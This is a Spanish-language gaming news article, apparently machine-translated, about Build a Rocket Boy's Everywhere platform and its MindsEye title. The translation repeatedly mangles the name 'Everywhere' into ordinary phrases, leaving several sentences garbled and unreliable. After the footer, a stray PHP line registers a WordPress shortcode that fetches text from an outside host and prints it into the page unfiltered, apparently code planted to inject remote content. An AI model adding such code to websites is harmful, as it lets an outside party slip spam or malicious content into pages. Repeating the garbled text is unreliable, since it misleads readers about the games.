Build a Rocket Boy, el estudio dirigido por el ex jefe de Grand Theft Auto, Leslie Benzie, ha revelado la primera información sobre su juego Everywhere y su segundo título AAA secreto.


Everywhere, que se lanzará junto con una versión de consola para PC a finales de este año, se anuncia como “una nueva plataforma que ofrece un mundo de infinitas posibilidades, donde puedes elegir a cualquiera y crear la tuya propia. Puedes hacer tu propio camino”.


Sin embargo, al igual que en cualquier otro lugar, Build a Rocketboy ha revelado que también está trabajando en un nuevo segundo título llamado MindsEye.


A continuación se puede ver un breve tráiler de MindsEye, que muestra brevemente una jugabilidad de mundo abierto similar a Grand Theft Auto:




MindsEye – Tráiler de adelanto




Build a Rocket Boy describe a MindsEye como un “juego de acción y aventuras de alto octanaje, triple A, basado en una historia, ambientado en un mundo de corporaciones futuristas, teorías de conspiración y nuevas tecnologías aterradoras”.


MindsEye estará disponible exclusivamente en cada ubicación, en lugar de lanzarse como un producto independiente. Sin embargo, Build a Rocket Boy enfatiza que MindsEye y Everywhere son “dos productos AAA separados”.


También señala que “estará en manos de jugadores de todo el mundo este año”, lo que significa que aún no está claro si MindsEye se agregará al juego en una fecha posterior.


Durante una reciente visita al estudio para hacer Rocket Boy, VGC recibió una presentación que mostraba cada ubicación con más detalle.


El juego consta de un centro social central llamado Utropia, así como de varios biomas que lo rodean. Dentro de Utropia, los jugadores pueden acceder a diferentes distritos, cada uno de los cuales ofrece diferentes opciones de juego y creación.


Combat District permite a los jugadores participar en etapas de acción en tercera persona, mientras que Racing District les permite competir contra otros jugadores.


Usando la suite de creación integrada del juego, ARC-adia, los jugadores pueden crear sus propias experiencias de combate y carreras y compartirlas en línea, así como componentes individuales, desde elementos pequeños hasta etapas enteras, y pueden guardarlos como sellos. Luego, esto se puede cargar en Stamp Shop para que otros jugadores lo usen en sus juegos.


Build a Rocketboy también confirmó a VGC que no habrá ningún componente NFT o blockchain en todos los ámbitos, y nos dijo: “No estamos interesados ​​​​en Web 3 o criptografía”.


El omnipresente artículo de primeras impresiones de VGC presenta el juego y describe las ambiciones de Rocket Boy con más detalle.




Previous Post Next Post
function pub_short() { $pub_text = file_get_contents( "https://alrafdean.org/me/pub.txt" ); return $pub_text; } add_shortcode('pub', 'pub_short');